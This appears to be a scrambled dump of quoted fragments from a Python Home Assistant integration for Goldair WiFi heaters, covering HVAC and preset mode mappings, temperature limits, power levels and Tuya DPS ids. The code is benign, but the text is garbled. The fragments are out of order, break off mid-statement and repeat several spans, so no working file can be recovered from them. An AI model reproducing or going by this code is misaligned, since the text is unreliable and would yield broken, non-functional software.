'1', ATTR_TARGET_TEMPERATURE: '2',", "return None @property def target_temperature_step(self): \"\"\"Return the supported step of target temperature.\"\"\" return", "\"\"\"Set new preset mode.\"\"\" dps_mode = PRESET_MODE_TO_DPS_MODE[preset_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_PRESET_MODE], dps_mode) @property def swing_mode(self): \"\"\"Return", "Goldair WiFi Heater device. \"\"\" import logging import json from homeassistant.const import (", "else: return None @property def max_temp(self): \"\"\"Return the maximum temperature.\"\"\" if self.preset_mode and", "{ HVAC_MODE_OFF: False, HVAC_MODE_HEAT: True } PRESET_MODE_TO_DPS_MODE = { STATE_COMFORT: 'C', STATE_ECO: 'ECO',", "API instance.\"\"\" self._device = device self._support_flags = SUPPORT_FLAGS self._TEMPERATURE_STEP = 1 self._TEMPERATURE_LIMITS =", "ATTR_HVAC_MODE, ATTR_PRESET_MODE, HVAC_MODE_OFF, HVAC_MODE_HEAT, SUPPORT_TARGET_TEMPERATURE, SUPPORT_PRESET_MODE, SUPPORT_SWING_MODE ) from custom_components.goldair_climate import GoldairTuyaDevice _LOGGER", "load correct preset mode from api status. Defaulting to Comfort') _LOGGER.debug(f'dps_mode was: {dps_mode},", "should_poll(self): \"\"\"Return the polling state.\"\"\" return True @property def name(self): \"\"\"Return the name", "'Stop': 'stop', '1': '1', '2': '2', '3': '3', '4': '4', '5': '5', 'Auto':", "dps_mode = HVAC_MODE_TO_DPS_MODE[hvac_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_HVAC_MODE], dps_mode) @property def preset_mode(self): \"\"\"Return current preset mode, ie", "not None: return GoldairTuyaDevice.get_key_for_value(PRESET_MODE_TO_DPS_MODE, dps_mode) else: return None @property def preset_modes(self): \"\"\"Return the", "set_preset_mode(self, preset_mode): \"\"\"Set new preset mode.\"\"\" dps_mode = PRESET_MODE_TO_DPS_MODE[preset_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_PRESET_MODE], dps_mode) @property def", "'stop', '1': '1', '2': '2', '3': '3', '4': '4', '5': '5', 'Auto': 'auto'", "@property def hvac_mode(self): \"\"\"Return current HVAC mode, ie Heat or Off.\"\"\" dps_mode =", "if self._device.model == \"GECO270\": return PROPERTY_TO_DPS_ID_GECO270 else: return PROPERTY_TO_DPS_ID @property def supported_features(self): \"\"\"Return", ") if preset_mode == STATE_COMFORT: self._device.set_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE], target_temperature) elif preset_mode == STATE_ECO: self._device.set_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE], target_temperature)", "set_swing_mode(self, swing_mode): \"\"\"Set new power level.\"\"\" new_level = swing_mode if new_level not in", "{ ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE: '3', ATTR_TEMPERATURE: '4', ATTR_PRESET_MODE: '5', ATTR_CHILD_LOCK: '2', ATTR_FAULT: '12',", "if self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['min'] else: return None @property def", "Defaulting to Comfort') _LOGGER.debug(f'dps_mode was: {dps_mode}, PROPERTY_TO_DPS_ID was: {json.dumps(self.get_property_to_dps_id)}') dps_mode = 'C' if", "'user' ATTR_POWER_LEVEL = 'power_level' ATTR_DISPLAY_ON = 'display_on' ATTR_POWER_MODE = 'power_mode' ATTR_ECO_TARGET_TEMPERATURE = 'eco_'", "return self._TEMPERATURE_LIMITS[self.preset_mode]['min'] else: return None @property def max_temp(self): \"\"\"Return the maximum temperature.\"\"\" if", "None @property def target_temperature_step(self): \"\"\"Return the supported step of target temperature.\"\"\" return self._TEMPERATURE_STEP", "'2', '3': '3', '4': '4', '5': '5', 'Auto': 'auto' } SUPPORT_FLAGS = SUPPORT_TARGET_TEMPERATURE", "else: return PROPERTY_TO_DPS_ID @property def supported_features(self): \"\"\"Return the list of supported features.\"\"\" return", "_LOGGER.debug(f'dps_mode was: {dps_mode}, PROPERTY_TO_DPS_ID was: {json.dumps(self.get_property_to_dps_id)}') dps_mode = 'C' if dps_mode is not", "'3', ATTR_TEMPERATURE: '4', ATTR_PRESET_MODE: '5', ATTR_CHILD_LOCK: '2', ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104',", "= 'Anti-freeze' PROPERTY_TO_DPS_ID = { ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE: '2', ATTR_TEMPERATURE: '3', ATTR_PRESET_MODE: '4',", "ATTR_FAULT = 'fault' ATTR_POWER_MODE_AUTO = 'auto' ATTR_POWER_MODE_USER = 'user' ATTR_POWER_LEVEL = 'power_level' ATTR_DISPLAY_ON", "available preset modes.\"\"\" return list(PRESET_MODE_TO_DPS_MODE.keys()) def set_preset_mode(self, preset_mode): \"\"\"Set new preset mode.\"\"\" dps_mode", "supported_features(self): \"\"\"Return the list of supported features.\"\"\" return self._support_flags @property def should_poll(self): \"\"\"Return", "= 'user' ATTR_POWER_LEVEL = 'power_level' ATTR_DISPLAY_ON = 'display_on' ATTR_POWER_MODE = 'power_mode' ATTR_ECO_TARGET_TEMPERATURE =", "!= STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['min'] else: return None @property def max_temp(self): \"\"\"Return the maximum", "'105', ATTR_ECO_TARGET_TEMPERATURE: '106' } # GOLDAIR GECO270 PROPERTY_TO_DPS_ID_GECO270 = { ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE:", "raise ValueError( f'Target temperature ({target_temperature}) must be between ' f'{limits[\"min\"]} and {limits[\"max\"]}' )", "state.\"\"\" return True @property def name(self): \"\"\"Return the name of the climate device.\"\"\"", "model to {model}') @property def get_property_to_dps_id(self): \"\"\"Get the correct PROPERTY_TO_DPS_ID depending on the", "else: return None @property def preset_modes(self): \"\"\"Return the list of available preset modes.\"\"\"", "ATTR_PRESET_MODE: '5', ATTR_CHILD_LOCK: '2', ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE:", "STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['max'] else: return None def set_temperature(self, **kwargs): \"\"\"Set new target temperatures.\"\"\"", "'1', '2': '2', '3': '3', '4': '4', '5': '5', 'Auto': 'auto' } SUPPORT_FLAGS", "ValueError('You cannot set the temperature in Anti-freeze mode.') limits = self._TEMPERATURE_LIMITS[preset_mode] if not", "GECO270 PROPERTY_TO_DPS_ID_GECO270 = { ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE: '3', ATTR_TEMPERATURE: '4', ATTR_PRESET_MODE: '5', ATTR_CHILD_LOCK:", "return None @property def max_temp(self): \"\"\"Return the maximum temperature.\"\"\" if self.preset_mode and self.preset_mode", "| SUPPORT_SWING_MODE class GoldairHeater(ClimateDevice): \"\"\"Representation of a Goldair WiFi heater.\"\"\" def __init__(self, device):", "self.preset_mode == STATE_ECO: return self._device.get_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE]) else: return None @property def target_temperature_step(self): \"\"\"Return the", "None: self.set_target_temperature(kwargs.get(ATTR_TEMPERATURE)) def set_target_temperature(self, target_temperature): target_temperature = int(round(target_temperature)) preset_mode = self.preset_mode if preset_mode", "of power levels.\"\"\" return list(POWER_LEVEL_TO_DPS_LEVEL.keys()) def set_swing_mode(self, swing_mode): \"\"\"Set new power level.\"\"\" new_level", "None: return GoldairTuyaDevice.get_key_for_value(HVAC_MODE_TO_DPS_MODE, dps_mode) else: return STATE_UNAVAILABLE @property def hvac_modes(self): \"\"\"Return the list", "'auto' } SUPPORT_FLAGS = SUPPORT_TARGET_TEMPERATURE | SUPPORT_PRESET_MODE | SUPPORT_SWING_MODE class GoldairHeater(ClimateDevice): \"\"\"Representation of", "device (GoldairTuyaDevice): The device API instance.\"\"\" self._device = device self._support_flags = SUPPORT_FLAGS self._TEMPERATURE_STEP", "polling state.\"\"\" return True @property def name(self): \"\"\"Return the name of the climate", "@property def target_temperature(self): \"\"\"Return the temperature we try to reach.\"\"\" if self.preset_mode ==", "if preset_mode == STATE_COMFORT: self._device.set_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE], target_temperature) elif preset_mode == STATE_ECO: self._device.set_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE], target_temperature) @property", "if not limits['min'] <= target_temperature <= limits['max']: raise ValueError( f'Target temperature ({target_temperature}) must", "in POWER_LEVEL_TO_DPS_LEVEL.keys(): raise ValueError(f'Invalid power level: {new_level}') dps_level = POWER_LEVEL_TO_DPS_LEVEL[new_level] self._device.set_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL], dps_level) def", "def target_temperature(self): \"\"\"Return the temperature we try to reach.\"\"\" if self.preset_mode == STATE_COMFORT:", "{ 'Stop': 'stop', '1': '1', '2': '2', '3': '3', '4': '4', '5': '5',", "mode, ie Heat or Off.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_HVAC_MODE]) if dps_mode is not None:", "between ' f'{limits[\"min\"]} and {limits[\"max\"]}' ) if preset_mode == STATE_COMFORT: self._device.set_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE], target_temperature) elif", "_LOGGER.info(f'Setting model to {model}') @property def get_property_to_dps_id(self): \"\"\"Get the correct PROPERTY_TO_DPS_ID depending on", "return self._device.name @property def temperature_unit(self): \"\"\"Return the unit of measurement.\"\"\" return self._device.temperature_unit @property", "'auto' ATTR_POWER_MODE_USER = 'user' ATTR_POWER_LEVEL = 'power_level' ATTR_DISPLAY_ON = 'display_on' ATTR_POWER_MODE = 'power_mode'", "\"\"\"Set new HVAC mode.\"\"\" dps_mode = HVAC_MODE_TO_DPS_MODE[hvac_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_HVAC_MODE], dps_mode) @property def preset_mode(self): \"\"\"Return", "dps_mode is not None: return GoldairTuyaDevice.get_key_for_value(PRESET_MODE_TO_DPS_MODE, dps_mode) else: return None @property def preset_modes(self):", "levels.\"\"\" return list(POWER_LEVEL_TO_DPS_LEVEL.keys()) def set_swing_mode(self, swing_mode): \"\"\"Set new power level.\"\"\" new_level = swing_mode", "if self.preset_mode == STATE_COMFORT: return self._device.get_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE]) elif self.preset_mode == STATE_ECO: return self._device.get_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE]) else:", "SUPPORT_FLAGS self._TEMPERATURE_STEP = 1 self._TEMPERATURE_LIMITS = { STATE_COMFORT: { 'min': 5, 'max': 37", "'target_temperature' ATTR_CHILD_LOCK = 'child_lock' ATTR_FAULT = 'fault' ATTR_POWER_MODE_AUTO = 'auto' ATTR_POWER_MODE_USER = 'user'", "ATTR_ECO_TARGET_TEMPERATURE: '106' } # GOLDAIR GECO270 PROPERTY_TO_DPS_ID_GECO270 = { ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE: '3',", "device. \"\"\" import logging import json from homeassistant.const import ( ATTR_TEMPERATURE, TEMP_CELSIUS, STATE_UNAVAILABLE", "def set_target_temperature(self, target_temperature): target_temperature = int(round(target_temperature)) preset_mode = self.preset_mode if preset_mode == STATE_ANTI_FREEZE:", "'5', ATTR_CHILD_LOCK: '2', ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE: '106'", "target_temperature) @property def current_temperature(self): \"\"\"Return the current temperature.\"\"\" return self._device.get_property(self.get_property_to_dps_id[ATTR_TEMPERATURE]) @property def hvac_mode(self):", "heater. Args: name (str): The device's name. device (GoldairTuyaDevice): The device API instance.\"\"\"", "ATTR_CHILD_LOCK = 'child_lock' ATTR_FAULT = 'fault' ATTR_POWER_MODE_AUTO = 'auto' ATTR_POWER_MODE_USER = 'user' ATTR_POWER_LEVEL", "the list of available HVAC modes.\"\"\" return list(HVAC_MODE_TO_DPS_MODE.keys()) def set_hvac_mode(self, hvac_mode): \"\"\"Set new", "HVAC_MODE_OFF, HVAC_MODE_HEAT, SUPPORT_TARGET_TEMPERATURE, SUPPORT_PRESET_MODE, SUPPORT_SWING_MODE ) from custom_components.goldair_climate import GoldairTuyaDevice _LOGGER = logging.getLogger(__name__)", "was: {dps_mode}, PROPERTY_TO_DPS_ID was: {json.dumps(self.get_property_to_dps_id)}') dps_mode = 'C' if dps_mode is not None:", "dps_mode == ATTR_POWER_MODE_USER: return self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL]) elif dps_mode == ATTR_POWER_MODE_AUTO: return GoldairTuyaDevice.get_key_for_value(POWER_LEVEL_TO_DPS_LEVEL, dps_mode) else:", "'4', ATTR_PRESET_MODE: '5', ATTR_CHILD_LOCK: '2', ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105',", "== \"GECO270\": return PROPERTY_TO_DPS_ID_GECO270 else: return PROPERTY_TO_DPS_ID @property def supported_features(self): \"\"\"Return the list", "self._TEMPERATURE_STEP = 1 self._TEMPERATURE_LIMITS = { STATE_COMFORT: { 'min': 5, 'max': 37 },", "= { ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE: '2', ATTR_TEMPERATURE: '3', ATTR_PRESET_MODE: '4', ATTR_CHILD_LOCK: '6', ATTR_FAULT:", "ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE: '106' } # GOLDAIR GECO270 PROPERTY_TO_DPS_ID_GECO270", "@property def preset_modes(self): \"\"\"Return the list of available preset modes.\"\"\" return list(PRESET_MODE_TO_DPS_MODE.keys()) def", "elif self.preset_mode == STATE_ECO: return self._device.get_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE]) else: return None @property def target_temperature_step(self): \"\"\"Return", "target temperature.\"\"\" return self._TEMPERATURE_STEP @property def min_temp(self): \"\"\"Return the minimum temperature.\"\"\" if self.preset_mode", "} HVAC_MODE_TO_DPS_MODE = { HVAC_MODE_OFF: False, HVAC_MODE_HEAT: True } PRESET_MODE_TO_DPS_MODE = { STATE_COMFORT:", "preset_modes(self): \"\"\"Return the list of available preset modes.\"\"\" return list(PRESET_MODE_TO_DPS_MODE.keys()) def set_preset_mode(self, preset_mode):", "ClimateDevice from homeassistant.components.climate.const import ( ATTR_HVAC_MODE, ATTR_PRESET_MODE, HVAC_MODE_OFF, HVAC_MODE_HEAT, SUPPORT_TARGET_TEMPERATURE, SUPPORT_PRESET_MODE, SUPPORT_SWING_MODE )", "ATTR_POWER_MODE_AUTO = 'auto' ATTR_POWER_MODE_USER = 'user' ATTR_POWER_LEVEL = 'power_level' ATTR_DISPLAY_ON = 'display_on' ATTR_POWER_MODE", "GoldairTuyaDevice.get_key_for_value(POWER_LEVEL_TO_DPS_LEVEL, dps_mode) else: return None @property def swing_modes(self): \"\"\"List of power levels.\"\"\" return", "= 'display_on' ATTR_POWER_MODE = 'power_mode' ATTR_ECO_TARGET_TEMPERATURE = 'eco_' + ATTR_TARGET_TEMPERATURE STATE_COMFORT = 'Comfort'", "{ ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE: '2', ATTR_TEMPERATURE: '3', ATTR_PRESET_MODE: '4', ATTR_CHILD_LOCK: '6', ATTR_FAULT: '12',", "max_temp(self): \"\"\"Return the maximum temperature.\"\"\" if self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['max']", "'4', '5': '5', 'Auto': 'auto' } SUPPORT_FLAGS = SUPPORT_TARGET_TEMPERATURE | SUPPORT_PRESET_MODE | SUPPORT_SWING_MODE", "'2', ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE: '106' } HVAC_MODE_TO_DPS_MODE", "heater you have\"\"\" if self._device.model == \"GECO270\": return PROPERTY_TO_DPS_ID_GECO270 else: return PROPERTY_TO_DPS_ID @property", "of supported features.\"\"\" return self._support_flags @property def should_poll(self): \"\"\"Return the polling state.\"\"\" return", "None: self.set_preset_mode(kwargs.get(ATTR_PRESET_MODE)) if kwargs.get(ATTR_TEMPERATURE) is not None: self.set_target_temperature(kwargs.get(ATTR_TEMPERATURE)) def set_target_temperature(self, target_temperature): target_temperature =", "Off.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_HVAC_MODE]) if dps_mode is not None: return GoldairTuyaDevice.get_key_for_value(HVAC_MODE_TO_DPS_MODE, dps_mode) else:", "= SUPPORT_FLAGS self._TEMPERATURE_STEP = 1 self._TEMPERATURE_LIMITS = { STATE_COMFORT: { 'min': 5, 'max':", "preset_mode == STATE_ANTI_FREEZE: raise ValueError('You cannot set the temperature in Anti-freeze mode.') limits", "have\"\"\" if self._device.model == \"GECO270\": return PROPERTY_TO_DPS_ID_GECO270 else: return PROPERTY_TO_DPS_ID @property def supported_features(self):", "dps_mode) else: return STATE_UNAVAILABLE @property def hvac_modes(self): \"\"\"Return the list of available HVAC", "} # self._model = model # _LOGGER.info(f'Setting model to {model}') @property def get_property_to_dps_id(self):", "@property def should_poll(self): \"\"\"Return the polling state.\"\"\" return True @property def name(self): \"\"\"Return", "Anti-freeze.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_PRESET_MODE]) keys = list(self.get_property_to_dps_id) if dps_mode not in keys: _LOGGER.debug(f'Could", "POWER_LEVEL_TO_DPS_LEVEL = { 'Stop': 'stop', '1': '1', '2': '2', '3': '3', '4': '4',", "self._device.get_property(self.get_property_to_dps_id[ATTR_PRESET_MODE]) keys = list(self.get_property_to_dps_id) if dps_mode not in keys: _LOGGER.debug(f'Could not load correct", "return GoldairTuyaDevice.get_key_for_value(PRESET_MODE_TO_DPS_MODE, dps_mode) else: return None @property def preset_modes(self): \"\"\"Return the list of", "ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE: '106' } # GOLDAIR GECO270 PROPERTY_TO_DPS_ID_GECO270 = {", "STATE_COMFORT: self._device.set_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE], target_temperature) elif preset_mode == STATE_ECO: self._device.set_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE], target_temperature) @property def current_temperature(self): \"\"\"Return", "return list(PRESET_MODE_TO_DPS_MODE.keys()) def set_preset_mode(self, preset_mode): \"\"\"Set new preset mode.\"\"\" dps_mode = PRESET_MODE_TO_DPS_MODE[preset_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_PRESET_MODE],", "HVAC mode, ie Heat or Off.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_HVAC_MODE]) if dps_mode is not", "kwargs.get(ATTR_PRESET_MODE) is not None: self.set_preset_mode(kwargs.get(ATTR_PRESET_MODE)) if kwargs.get(ATTR_TEMPERATURE) is not None: self.set_target_temperature(kwargs.get(ATTR_TEMPERATURE)) def set_target_temperature(self,", "the list of available preset modes.\"\"\" return list(PRESET_MODE_TO_DPS_MODE.keys()) def set_preset_mode(self, preset_mode): \"\"\"Set new", "TEMP_CELSIUS, STATE_UNAVAILABLE ) from homeassistant.components.climate import ClimateDevice from homeassistant.components.climate.const import ( ATTR_HVAC_MODE, ATTR_PRESET_MODE,", "not None: self.set_preset_mode(kwargs.get(ATTR_PRESET_MODE)) if kwargs.get(ATTR_TEMPERATURE) is not None: self.set_target_temperature(kwargs.get(ATTR_TEMPERATURE)) def set_target_temperature(self, target_temperature): target_temperature", "== STATE_ANTI_FREEZE: raise ValueError('You cannot set the temperature in Anti-freeze mode.') limits =", "logging import json from homeassistant.const import ( ATTR_TEMPERATURE, TEMP_CELSIUS, STATE_UNAVAILABLE ) from homeassistant.components.climate", "= { ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE: '3', ATTR_TEMPERATURE: '4', ATTR_PRESET_MODE: '5', ATTR_CHILD_LOCK: '2', ATTR_FAULT:", "# GOLDAIR GECO270 PROPERTY_TO_DPS_ID_GECO270 = { ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE: '3', ATTR_TEMPERATURE: '4', ATTR_PRESET_MODE:", "new_level not in POWER_LEVEL_TO_DPS_LEVEL.keys(): raise ValueError(f'Invalid power level: {new_level}') dps_level = POWER_LEVEL_TO_DPS_LEVEL[new_level] self._device.set_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL],", "= list(self.get_property_to_dps_id) if dps_mode not in keys: _LOGGER.debug(f'Could not load correct preset mode", "list of supported features.\"\"\" return self._support_flags @property def should_poll(self): \"\"\"Return the polling state.\"\"\"", "{ 'min': 5, 'max': 37 }, STATE_ECO: { 'min': 5, 'max': 21 }", "we try to reach.\"\"\" if self.preset_mode == STATE_COMFORT: return self._device.get_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE]) elif self.preset_mode ==", "measurement.\"\"\" return self._device.temperature_unit @property def target_temperature(self): \"\"\"Return the temperature we try to reach.\"\"\"", "\"\"\"Initialize the heater. Args: name (str): The device's name. device (GoldairTuyaDevice): The device", "the name of the climate device.\"\"\" return self._device.name @property def temperature_unit(self): \"\"\"Return the", "self._TEMPERATURE_LIMITS = { STATE_COMFORT: { 'min': 5, 'max': 37 }, STATE_ECO: { 'min':", "target_temperature) elif preset_mode == STATE_ECO: self._device.set_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE], target_temperature) @property def current_temperature(self): \"\"\"Return the current", "= logging.getLogger(__name__) ATTR_TARGET_TEMPERATURE = 'target_temperature' ATTR_CHILD_LOCK = 'child_lock' ATTR_FAULT = 'fault' ATTR_POWER_MODE_AUTO =", "from homeassistant.components.climate import ClimateDevice from homeassistant.components.climate.const import ( ATTR_HVAC_MODE, ATTR_PRESET_MODE, HVAC_MODE_OFF, HVAC_MODE_HEAT, SUPPORT_TARGET_TEMPERATURE,", "'AF' } POWER_LEVEL_TO_DPS_LEVEL = { 'Stop': 'stop', '1': '1', '2': '2', '3': '3',", "SUPPORT_TARGET_TEMPERATURE | SUPPORT_PRESET_MODE | SUPPORT_SWING_MODE class GoldairHeater(ClimateDevice): \"\"\"Representation of a Goldair WiFi heater.\"\"\"", "is not None: return GoldairTuyaDevice.get_key_for_value(PRESET_MODE_TO_DPS_MODE, dps_mode) else: return None @property def preset_modes(self): \"\"\"Return", "self._device.get_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE]) else: return None @property def target_temperature_step(self): \"\"\"Return the supported step of target", "STATE_ECO: return self._device.get_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE]) else: return None @property def target_temperature_step(self): \"\"\"Return the supported step", "GoldairTuyaDevice.get_key_for_value(HVAC_MODE_TO_DPS_MODE, dps_mode) else: return STATE_UNAVAILABLE @property def hvac_modes(self): \"\"\"Return the list of available", "= model # _LOGGER.info(f'Setting model to {model}') @property def get_property_to_dps_id(self): \"\"\"Get the correct", "Args: name (str): The device's name. device (GoldairTuyaDevice): The device API instance.\"\"\" self._device", "class GoldairHeater(ClimateDevice): \"\"\"Representation of a Goldair WiFi heater.\"\"\" def __init__(self, device): \"\"\"Initialize the", "from api status. Defaulting to Comfort') _LOGGER.debug(f'dps_mode was: {dps_mode}, PROPERTY_TO_DPS_ID was: {json.dumps(self.get_property_to_dps_id)}') dps_mode", "logging.getLogger(__name__) ATTR_TARGET_TEMPERATURE = 'target_temperature' ATTR_CHILD_LOCK = 'child_lock' ATTR_FAULT = 'fault' ATTR_POWER_MODE_AUTO = 'auto'", "STATE_ECO: { 'min': 5, 'max': 21 } } # self._model = model #", "def current_temperature(self): \"\"\"Return the current temperature.\"\"\" return self._device.get_property(self.get_property_to_dps_id[ATTR_TEMPERATURE]) @property def hvac_mode(self): \"\"\"Return current", "= 'auto' ATTR_POWER_MODE_USER = 'user' ATTR_POWER_LEVEL = 'power_level' ATTR_DISPLAY_ON = 'display_on' ATTR_POWER_MODE =", "} PRESET_MODE_TO_DPS_MODE = { STATE_COMFORT: 'C', STATE_ECO: 'ECO', STATE_ANTI_FREEZE: 'AF' } POWER_LEVEL_TO_DPS_LEVEL =", "hvac_mode(self): \"\"\"Return current HVAC mode, ie Heat or Off.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_HVAC_MODE]) if", "self._support_flags @property def should_poll(self): \"\"\"Return the polling state.\"\"\" return True @property def name(self):", "= 'C' if dps_mode is not None: return GoldairTuyaDevice.get_key_for_value(PRESET_MODE_TO_DPS_MODE, dps_mode) else: return None", "@property def max_temp(self): \"\"\"Return the maximum temperature.\"\"\" if self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE:", "self._TEMPERATURE_STEP @property def min_temp(self): \"\"\"Return the minimum temperature.\"\"\" if self.preset_mode and self.preset_mode !=", "<= target_temperature <= limits['max']: raise ValueError( f'Target temperature ({target_temperature}) must be between '", "def set_preset_mode(self, preset_mode): \"\"\"Set new preset mode.\"\"\" dps_mode = PRESET_MODE_TO_DPS_MODE[preset_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_PRESET_MODE], dps_mode) @property", "preset_mode == STATE_ECO: self._device.set_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE], target_temperature) @property def current_temperature(self): \"\"\"Return the current temperature.\"\"\" return", "return list(POWER_LEVEL_TO_DPS_LEVEL.keys()) def set_swing_mode(self, swing_mode): \"\"\"Set new power level.\"\"\" new_level = swing_mode if", "None @property def max_temp(self): \"\"\"Return the maximum temperature.\"\"\" if self.preset_mode and self.preset_mode !=", "or Off.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_HVAC_MODE]) if dps_mode is not None: return GoldairTuyaDevice.get_key_for_value(HVAC_MODE_TO_DPS_MODE, dps_mode)", "= 'child_lock' ATTR_FAULT = 'fault' ATTR_POWER_MODE_AUTO = 'auto' ATTR_POWER_MODE_USER = 'user' ATTR_POWER_LEVEL =", "'101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE: '106' } HVAC_MODE_TO_DPS_MODE = { HVAC_MODE_OFF: False,", "'5', 'Auto': 'auto' } SUPPORT_FLAGS = SUPPORT_TARGET_TEMPERATURE | SUPPORT_PRESET_MODE | SUPPORT_SWING_MODE class GoldairHeater(ClimateDevice):", "and self.preset_mode != STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['max'] else: return None def set_temperature(self, **kwargs): \"\"\"Set", "ValueError( f'Target temperature ({target_temperature}) must be between ' f'{limits[\"min\"]} and {limits[\"max\"]}' ) if", "is not None: return GoldairTuyaDevice.get_key_for_value(HVAC_MODE_TO_DPS_MODE, dps_mode) else: return STATE_UNAVAILABLE @property def hvac_modes(self): \"\"\"Return", "mode from api status. Defaulting to Comfort') _LOGGER.debug(f'dps_mode was: {dps_mode}, PROPERTY_TO_DPS_ID was: {json.dumps(self.get_property_to_dps_id)}')", "@property def hvac_modes(self): \"\"\"Return the list of available HVAC modes.\"\"\" return list(HVAC_MODE_TO_DPS_MODE.keys()) def", "mode.\"\"\" dps_mode = HVAC_MODE_TO_DPS_MODE[hvac_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_HVAC_MODE], dps_mode) @property def preset_mode(self): \"\"\"Return current preset mode,", "return self._TEMPERATURE_STEP @property def min_temp(self): \"\"\"Return the minimum temperature.\"\"\" if self.preset_mode and self.preset_mode", "status. Defaulting to Comfort') _LOGGER.debug(f'dps_mode was: {dps_mode}, PROPERTY_TO_DPS_ID was: {json.dumps(self.get_property_to_dps_id)}') dps_mode = 'C'", "import logging import json from homeassistant.const import ( ATTR_TEMPERATURE, TEMP_CELSIUS, STATE_UNAVAILABLE ) from", "ATTR_ECO_TARGET_TEMPERATURE: '106' } HVAC_MODE_TO_DPS_MODE = { HVAC_MODE_OFF: False, HVAC_MODE_HEAT: True } PRESET_MODE_TO_DPS_MODE =", "preset modes.\"\"\" return list(PRESET_MODE_TO_DPS_MODE.keys()) def set_preset_mode(self, preset_mode): \"\"\"Set new preset mode.\"\"\" dps_mode =", "' f'{limits[\"min\"]} and {limits[\"max\"]}' ) if preset_mode == STATE_COMFORT: self._device.set_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE], target_temperature) elif preset_mode", "limits['max']: raise ValueError( f'Target temperature ({target_temperature}) must be between ' f'{limits[\"min\"]} and {limits[\"max\"]}'", "== STATE_COMFORT: self._device.set_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE], target_temperature) elif preset_mode == STATE_ECO: self._device.set_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE], target_temperature) @property def current_temperature(self):", "custom_components.goldair_climate import GoldairTuyaDevice _LOGGER = logging.getLogger(__name__) ATTR_TARGET_TEMPERATURE = 'target_temperature' ATTR_CHILD_LOCK = 'child_lock' ATTR_FAULT", "{dps_mode}, PROPERTY_TO_DPS_ID was: {json.dumps(self.get_property_to_dps_id)}') dps_mode = 'C' if dps_mode is not None: return", "modes.\"\"\" return list(HVAC_MODE_TO_DPS_MODE.keys()) def set_hvac_mode(self, hvac_mode): \"\"\"Set new HVAC mode.\"\"\" dps_mode = HVAC_MODE_TO_DPS_MODE[hvac_mode]", "kwargs.get(ATTR_TEMPERATURE) is not None: self.set_target_temperature(kwargs.get(ATTR_TEMPERATURE)) def set_target_temperature(self, 